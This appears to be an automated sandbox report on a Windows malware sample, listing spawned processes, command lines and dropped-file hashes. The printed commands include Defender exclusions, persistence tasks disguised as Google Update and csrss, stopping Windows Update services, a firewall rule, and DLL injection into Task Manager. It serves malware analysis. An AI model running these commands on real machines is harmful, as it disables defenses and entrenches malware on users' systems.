C:\Users\Admin\AppData\Local\Temp\7CA0.exe

C:\Users\Admin\AppData\Local\Temp\7D1E.exe

C:\Users\Admin\AppData\Local\Temp\7D1E.exe

C:\Users\Admin\AppData\Local\Temp\7DAC.exe

C:\Users\Admin\AppData\Local\Temp\7DAC.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe

C:\Users\Admin\AppData\Local\Temp\7EB7.exe

C:\Users\Admin\AppData\Local\Temp\7EB7.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff810b046f8,0x7ff810b04708,0x7ff810b04718

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 224 -ip 224

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 792

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff810b046f8,0x7ff810b04708,0x7ff810b04718

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\9879.exe

C:\Users\Admin\AppData\Local\Temp\9879.exe

C:\Users\Admin\AppData\Local\Temp\9A9D.exe

C:\Users\Admin\AppData\Local\Temp\9A9D.exe

C:\Users\Admin\AppData\Local\Temp\9CA2.exe

C:\Users\Admin\AppData\Local\Temp\9CA2.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\A463.exe

C:\Users\Admin\AppData\Local\Temp\A463.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2888 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2940 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,15103402643162731615,17550131249319213560,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp" /SL5="$C01DC,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Lj998Dz.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Lj998Dz.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 5984 -ip 5984

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5840 -ip 5840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 540

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,12117135881609447139,17778233830271467621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\478A.exe

C:\Users\Admin\AppData\Local\Temp\478A.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network


Files

memory/4672-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4672-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4672-3-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3232-2-0x0000000002A00000-0x0000000002A16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7A3C.exe

MD5 51aa2ee477e0d873898ad3d8e4d5d235
SHA1 3765dfa792f3f66c5c061c5fd930a690f9fd3965
SHA256 31b7b6e15ebbc483b7b5df24754c925e34b3d6dc2b1a24d100f2a315a407fa64
SHA512 10d7c388e9f544369e145414372d3ae62ef30c3bca27f77216b1961eaca0bcd8ad4531d3a07e6180dc5afcd7302e5e62e2d8e925b701b495bcf1b72d06e0ab9e

C:\Users\Admin\AppData\Local\Temp\7A3C.exe

MD5 51aa2ee477e0d873898ad3d8e4d5d235
SHA1 3765dfa792f3f66c5c061c5fd930a690f9fd3965
SHA256 31b7b6e15ebbc483b7b5df24754c925e34b3d6dc2b1a24d100f2a315a407fa64
SHA512 10d7c388e9f544369e145414372d3ae62ef30c3bca27f77216b1961eaca0bcd8ad4531d3a07e6180dc5afcd7302e5e62e2d8e925b701b495bcf1b72d06e0ab9e

C:\Users\Admin\AppData\Local\Temp\7B18.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\7B18.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\7BE4.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\7CA0.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\7CA0.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\7D1E.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\7D1E.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\7DAC.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\7DAC.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe

MD5 a575a6103ddff4aa59de9199c0bf420c
SHA1 52cb4ae7f9e8bc0236d17b26cd48c0f04b5a6318
SHA256 faece869796f484113b60e476df7b153e376ceffc522c50bcbf34d6fc27fedfa
SHA512 060317e7349c77802a512bd3dab66e532b53ac6a61f6a5752b6b6a3263176c97b72ff9a68e1b0f255d72f2019c8f716a12885948f917fdd3e320ad10db37470d

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe

MD5 a575a6103ddff4aa59de9199c0bf420c
SHA1 52cb4ae7f9e8bc0236d17b26cd48c0f04b5a6318
SHA256 faece869796f484113b60e476df7b153e376ceffc522c50bcbf34d6fc27fedfa
SHA512 060317e7349c77802a512bd3dab66e532b53ac6a61f6a5752b6b6a3263176c97b72ff9a68e1b0f255d72f2019c8f716a12885948f917fdd3e320ad10db37470d

C:\Users\Admin\AppData\Local\Temp\7EB7.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Ni67nV.exe

MD5 92c39aa3a62bd0435aee9f1eb11eaa70
SHA1 c1131234a1c5bced1af918b43615a0b915b00604
SHA256 7db6a6275dbae7e5d253ddec7ac62fb5dcfecfe222110e1ca9ad0a4741da41b7
SHA512 e89d77233654792d4313803d325bd48f8f42d6785cc5dc5a52977245127240ea94e91d039a50c5752a66cdcdff6671c17bb53b1c536405a60b18f48f522eb983

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe

MD5 752105de893af01e5f40d0c709285c26
SHA1 9487f9a62a77a909ecdbad72e3d012ad420a5131
SHA256 1b73f830a421b4eff5f8809ca09e67bcd8aa6a9029558a71e117a34d01f20e1d
SHA512 6cdaf41eca636d622f830a8eb3aa2999ff4b4375e791770bc817a2c27be3a7d28a6648b0854cb7036b8d80a10c747a8bdff03a8f85ab18912fd98b546693d3ab

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe

MD5 752105de893af01e5f40d0c709285c26
SHA1 9487f9a62a77a909ecdbad72e3d012ad420a5131
SHA256 1b73f830a421b4eff5f8809ca09e67bcd8aa6a9029558a71e117a34d01f20e1d
